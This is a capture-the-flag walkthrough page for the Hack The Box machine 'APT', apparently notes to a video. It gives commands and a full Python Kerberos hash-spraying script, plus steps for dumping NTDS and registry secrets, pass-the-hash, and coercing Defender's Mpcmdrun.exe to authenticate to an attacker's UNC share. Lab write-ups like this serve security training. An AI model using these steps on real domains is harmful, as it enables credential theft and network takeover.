APT - xct's notes

Search…

APT

Notes for https://youtu.be/ZnUIiVwNSHk

User
Get IPv6 Address with https://github.com/mubix/IOXIDResolver​
1
python3 IOXIDResolver.py -t apt.htb
2
Address: apt
3
Address: 10.129.124.109
4
Address: dead:beef::8884:1fcc:ce90:638f
Copied!
Secretsdump from backup.zip
1
secretsdump.py -system SYSTEM -security SECURITY -ntds ../Active\ Directory/ntds.dit LOCAL | tee hashes
Copied!
Spray Hashes 
Modified from here by InfoSecJack:
1
#!/usr/bin/python3
2
from __future__ import division
3
from __future__ import print_function
4
import sys
5
import argparse
6
import socket
7
from time import sleep
8
import re
9
from impacket.smbconnection import SMBConnection
10
from impacket import smbconnection
11
import multiprocessing
12
import traceback
13
import argparse
14
import sys
15
from binascii import unhexlify
16
from impacket.krb5.kerberosv5 import getKerberosTGT, KerberosError
17
from impacket.krb5 import constants
18
from impacket.krb5.types import Principal
19
import multiprocessing
20
import socket
21
​
22
def gethost_addrinfo(hostname):
23
    try:
24
        for res in socket.getaddrinfo(hostname, None, socket.AF_INET6,
25
                socket.SOCK_DGRAM, socket.IPPROTO_IP, socket.AI_CANONNAME):
26
            af, socktype, proto, canonname, sa = res
27
    except socket.gaierror:
28
        for res in socket.getaddrinfo(hostname, None, socket.AF_INET,
29
                socket.SOCK_DGRAM, socket.IPPROTO_IP, socket.AI_CANONNAME):
30
            af, socktype, proto, canonname, sa = res
31
​
32
    return sa[0]
33
​
34
​
35
def _login(username, password, domain, lmhash, nthash, aesKey, dc_ip):
36
    dc_ip = gethost_addrinfo(dc_ip)
37
    try:
38
        kerb_principal = Principal(username, type=constants.PrincipalNameType.NT_PRINCIPAL.value)
39
        getKerberosTGT(kerb_principal, password, domain,
40
            unhexlify(lmhash), unhexlify(nthash), aesKey, dc_ip)
41
        print('[+] Success %s/%s' % (domain, username) )
42
        return True
43
    except KerberosError as e:
44
        return False
45
        if (e.getErrorCode() == constants.ErrorCodes.KDC_ERR_C_PRINCIPAL_UNKNOWN.value) or (e.getErrorCode() == constants.ErrorCodes.KDC_ERR_CLIENT_REVOKED.value) or (e.getErrorCode() == constants.ErrorCodes.KDC_ERR_WRONG_REALM.value):
46
           print("[-]Could not find username: %s/%s" % (domain, username) )
47
        elif e.getErrorCode() == constants.ErrorCodes.KDC_ERR_PREAUTH_FAILED.value:
48
            return
49
        else:
50
            print(e)
51
    except socket.error as e:
52
        print('[-]Could not connect to DC')
53
        return
54
​
55
DOMAIN = 'htb.local'
56
USERNAME = 'henry.vinson'
57
def login(username, hash):
58
	return _login(username, '', DOMAIN, '', hash, None, "apt6.htb")
59
​
60
passwords = [x.strip() for x in open("hashes.txt").readlines()]
61
SLEEP_TIME = 5
62
​
63
for x in passwords:
64
	if login(USERNAME, x):
65
		print(f"[+] Success {x}")
66
		exit()
Copied!
Dump Remote Registry
1
reg.py htb.local/[email protected] -hashes :*** query -keyName HKU -s | tee hku.reg
Copied!
Root
Authenticate with Machine Account to our box
1
C:\progra~1\Window~1\Mpcmdrun.exe -Scan -ScanType 3 -File '\\***\xct\xct'
Copied!
Secretsdump with Machine Account
1
secretsdump.py htb.local/'APT#x27;@apt6.htb -hashes :***
Copied!